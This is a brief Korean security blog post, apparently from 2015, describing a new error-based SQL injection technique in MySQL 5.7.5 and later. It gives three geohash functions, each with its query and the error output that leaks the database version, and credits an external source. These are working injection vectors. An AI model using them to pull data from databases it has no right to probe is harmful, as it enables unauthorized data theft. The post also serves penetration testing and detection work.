본문 바로가기
Security

New Error Based SQL Injection in MySQL >= 5.7.5

by Hide­ 2015. 4. 5.
반응형

1. ST_LatFromGeoHash()

mysql> select ST_LatFromGeoHash(version());

-> ERROR 1411 (HY000): Incorrect geohash value: '5.7.6-community' for function ST_LATFROMGEOHASH


2. ST_LongFromGeoHash()

mysql> select ST_LongFromGeoHash(version());

-> ERROR 1411 (HY000): Incorrect geohash value: '5.7.6-community' for function ST_LONGFROMGEOHASH


3. ST_PointFromGeoHash()

mysql> select ST_PointFromGeoHash(version(),0);

-> ERROR 1411 (HY000): Incorrect geohash value: '5.7.6-community' for function st_pointfromgeohash


출처 : http://dsrbr.blogspot.ru/2015/03/new-error-based-sql-injection-vectors.html?m=1

'Security' 카테고리의 다른 글

PHP Object Injection  (0) 2016.02.19
main() 호출과정  (0) 2015.10.05
Natas 11  (0) 2015.03.05
Limit 구문에서의 SQL Injection  (2) 2015.02.27
리눅스 보호기법 확인  (2) 2015.02.26